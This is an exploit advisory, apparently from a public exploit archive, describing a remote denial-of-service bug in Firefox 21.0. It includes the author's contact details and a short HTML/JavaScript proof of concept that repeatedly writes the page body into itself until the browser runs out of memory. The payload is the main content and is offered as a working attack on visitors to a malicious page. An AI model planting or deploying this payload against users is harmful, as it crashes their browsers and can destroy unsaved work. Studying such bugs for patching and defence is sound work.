Title : Mozilla Firefox Browser 21.0 Remote Denial Of Service Author : Jigsaw (Abdelmorite Eljoaydi) Date : 22-06-2013 E-mail : jigsaw0658@gmail.com Home : Morroco Facebook page : facebook.com/abdelmorit.alma platform : software Impact : Denial Of Service ( all tabs are no longer accessible, your work might be lost) Tested on : Mozilla Firefox 21.0 the latest release OS : Tested on Windows 7/ Windows XP Risk : Low[+] / Medium[-] =========================================================================================== #Vulnerability: This bug is a typical result of endless dialog loop. The flaw exists when the attacker put document.write(document.body.innerHTML) in multitudinous loop that make the browser Unable to handle this exception and fall in Out of Memory. User interaction is required to exploit this vulnerability in that the target must visit a malicious web page. ============================================================================================ #Proof of Concept: <html> <body> <script> document.write("") </script> </body> <script> var i=0; for (i=0;i<=99;i++) { document.write(document.body.innerHTML); } </script> </html> ================================================================================================